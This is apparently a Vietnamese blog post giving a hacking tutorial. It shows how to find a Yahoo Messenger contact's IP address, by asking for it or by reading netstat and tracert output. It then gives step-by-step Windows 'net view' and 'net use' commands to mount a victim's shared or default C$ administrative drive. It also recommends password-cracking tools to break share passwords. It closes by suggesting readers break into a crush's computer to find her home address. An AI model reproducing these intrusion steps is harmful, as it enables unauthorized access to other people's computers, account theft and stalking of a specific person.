Cách đầu tiên rất là dễ, dễ như uống trà với mức chà là vậy.
Đầu tiên mở cửa sổ chat lên, hỏi thăm đối phương, tìm cách câu giờ, canh đến lúc thích hợp về độ tin cậy và tâm lý đối phương thì gõ vào cửa sổ chat là: "Can you send your IP to me?" và có thể bạn sẽ được trả lời. Tỉ lệ thành công là : hên xui. Nếu không thích cách này lắm thì bạn thử cách sau xem:
Đầu tiên bạn vào Start ---> cmd ( hoặc command , tùy vào dv có khoá hay không ) ---> nó sẽ hiện lên 1 màn hình DOS , bạn bấm lệnh :
Mã:
c:windows> netstat -an
Trích:
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1032 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1042 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1044 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1046 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1048 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1178 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1772 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1774 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5101 0.0.0.0:0 LISTENING
TCP 10.0.0.70:139 0.0.0.0:0 LISTENING
TCP 10.0.0.70:1042 207.46.249.56:80 CLOSE_WAIT
TCP 10.0.0.70:1044 207.46.244.158:80 CLOSE_WAIT
TCP 10.0.0.70:1046 207.46.197.121:80 CLOSE_WAIT
TCP 10.0.0.70:1054 0.0.0.0:0 LISTENING
TCP 10.0.0.70:1178 216.155.193.179:5050 ESTABLISHED
TCP 10.0.0.70:1242 0.0.0.0:0 LISTENING
TCP 10.0.0.70:1242 10.0.0.99:139 ESTABLISHED
TCP 10.0.0.70:1767 0.0.0.0:0 LISTENING
TCP 10.0.0.70:1767 10.0.0.199:139 ESTABLISHED
TCP 10.0.0.70:1771 66.98.134.72:80 TIME_WAIT
TCP 10.0.0.70:1772 66.98.134.72:80 ESTABLISHED
TCP 10.0.0.70:1774 66.98.134.72:80 ESTABLISHED
TCP 127.0.0.1:1031 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 10.0.0.70:137 *:*
UDP 10.0.0.70:138 *:*
UDP 10.0.0.70:500 *:*
UDP 10.0.0.70:4500 *:*
UDP 127.0.0.1:1183 *:*
UDP 127.0.0.1:1223 *:*
UDP 127.0.0.1:1298 *:*
UDP 127.0.0.1:1494 *:*
Tiếp theo bạn để ý 1 cái này hen . IP của YM khi chat qua mạng dv ADSL thường bị giấu mất tích cái đuôi cs52.msg.dcn.yahoo.com . Nên khi đó bạn phải xác định thật chính xác số IP của mình là bao nhiêu đã nhé . Nhưng thông thường khi bạn chat như thế thì để ý cái :
Trích:
TCP 10.0.0.70:1178 216.155.193.179:5050 ESTABLISHED
Nhất là dòng chữ ESTABLISHED và port 5050 nó chính là thằng Yahoo đó . Bạn bấm tiếp lệnh :
Mã:
C:window>tracert 216.155.193.179
Trích:
Tracing route to cs52.msg.dcn.yahoo.com ( cái này chứng tỏ mình đã xác định đúng ) [216.155.193.179]
over a maximum of 30 hops:
1 <10 ms <10 ms <10 ms 10.0.0.138
2 10 ms 10 ms 10 ms 203.162.164.1
3 10 ms 10 ms 20 ms localhost [203.210.147.33]
4 70 ms 90 ms 30 ms localhost [203.210.146.10]
5 20 ms 30 ms 20 ms 203.162.119.161
6 30 ms 20 ms 60 ms 203.162.6.35
7 80 ms 90 ms 40 ms 203.162.27.70
8 * * * Request timed out.
9 * * * Request timed out.
10 * * * Request timed out.
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * 300 ms 321 ms dcr1-loopback.Washington.savvis.net [206.24.226.99]
16 350 ms 321 ms 330 ms bhr1-pos-10-0.Sterling2dc3.savvis.net [206.24.238.38]
17 * 400 ms 361 ms 216.109.75.254
18 381 ms 410 ms 391 ms vl47.bas1-m.dcn.yahoo.com [216.109.120.218]
19 390 ms 341 ms 380 ms cs52.msg.dcn.yahoo.com [216.155.193.179]
Trace complete.- Cuối cùng nó cái cái mình cần tìm là đây :
Trích:
3 10 ms 10 ms 20 ms localhost [203.210.147.33]
4 70 ms 90 ms 30 ms localhost [203.210.146.10]
5 20 ms 30 ms 20 ms 203.162.119.161
- Lưu ý 2 số IP localhost là IP do dv mạng che lại và thông thường đó là số IP cua ADSL nó không làm được cái trò trống gì đâu á . Cái cuối cùng là cái ăn thua đó . À còn với các bạn sử dụng máy nhà thì có lẽ đơn giản hơn nhiều vì thông thường nó chỉ xuất hiện cái IP cuối cùng thôi .
- À đọc xong thì có lẽ có bạn hỏi tôi , các số IP còn lại thì sao ? Các số còn lại chính là localhost của chính dv bạn làm đó . Muốn xác định được nó thì bạn cứ :
Mã:
c:window>ipconfig /all
Trích:
Cocuments and SettingsAdministrator>ipconfig /all
Windows 2000 IP Configuration
Host Name . . . . . . . . . . . . : May70
Primary DNS Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Broadcast
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139/810x Family Fast Eth
ernet NIC
Physical Address. . . . . . . . . : 00-E0-1A-00-0B-6C
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 10.0.0.70
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.0.138
DNS Servers . . . . . . . . . . . : 203.162.4.1
203.162.0.11
Loại tất cả các số IP đó ra hen, vì đó thường là các số IP local do các dv mạch định không phải là IP thực.
Xâm nhập máy tính đang Online là một kỹ thuật vừa dễ lại vừa khó . Bạn có thể nói dễ khi bạn sử dụng công cụ ENT 3 nhưng bạn sẽ gặp vấn đề khi dùng nó là tốc độ sử dụng trên máy của nạn nhân sẽ bị chậm đi một cách
đáng kể và những máy họ không share thì không thể xâm nhập được, do đó
nếu họ tắt máy là mình sẽ bị công cốc khi chưa kịp chôm account , có một
cách êm thấm hơn , ít làm giảm tốc độ hơn và có thể xâm nhập khi nạn nhân
không share là dùng chương trình DOS để tấn công .
Dùng chương trình scan IP như ENT 3 để scan IP mục tiêu .
--->>Các bước thực hiện:
(1). Vào Start ==> Run gõ lệnh cmd .
(2). Trong cửa sổ DOS hãy đánh lệnh “net view <IP của nạn nhân>”
+ VD : c:\net view 203.162.30.xx
(3). Bạn hãy nhìn kết quả , nếu nó có share thì dễ quá , bạn chỉ cần đánh
tiếp lệnh
net use <ổ đĩa bất kỳ trên máy của bạn> : <ip của nạn nhân><ổ share của
nạn nhân>
+ VD : c:\net use E : 203.162.30.xxC
(4). Nếu khi kết nối máy nạn nhân mà có yêu cầu sử dụng Passwd thì bạn hãy
download chương trình dò passwd về sử dụng ( theo tôi bạn hãy load chương trình “pqwak2” áp dụng cho việc dò passwd trên máy sử dụng HĐH Win98 hoặc Winme và chương trình “xIntruder” dùng cho Win NT ) . Chú ý là về cách sử dụng thì hai chương trình tương tự nhau , dòng đầu ta đánh IP của nạn nhân , dòng thứ hai ta đánh tên ổ đĩa share của nạn nhân nhưng đối với “xIntruder” ta chú ý chỉnh Delay của nó cho hợp lý , trong mạng LAN thì Delay của nó là 100 còn trong mạng Internet là trên dướI 5000 .
(5). Nếu máy của nạn nhân không có share thì ta đánh lệnh :
net use <ổ đĩa bất kỳ trên máy của bạn> : <ip của nạn nhân>c$ (hoặc
d$)"administrator"
+ VD : net use E : 203.162.30.xxC$"administrator"
Kiểu chia sẽ bằng c$ là mặc định đối với tất cả các máy USER là
"administrator" .
(6). Chúng ta có thể áp dụng cách này để đột nhập vào máy của cô bạn mà mình
“thầm thương trộm nhớ” để tìm những dữ liệu liên quan đến địa chỉ
của cô nàng ( với điều kiện là cô ta đang dùng máy ở nhà và bạn may mắn khi
tìm được địa chỉ đó ) . Bạn chỉ cần chat Y!Mass rồi vào DOS đánh lệnh :
c:\netstat –n
Khi dùng cách này bạn hãy tắt hết các cửa sổ khác chỉ để khung chat Y!Mass
với cô ta thôi , nó sẽ giúp bạn dễ dàng hơn trong việc xác định địa chỉ IP
của cô ta . Sau đó bạn dùng cách xâm nhập mà tôi đã nói ở trên , chúc vui !
Không có nhận xét nào:
Đăng nhận xét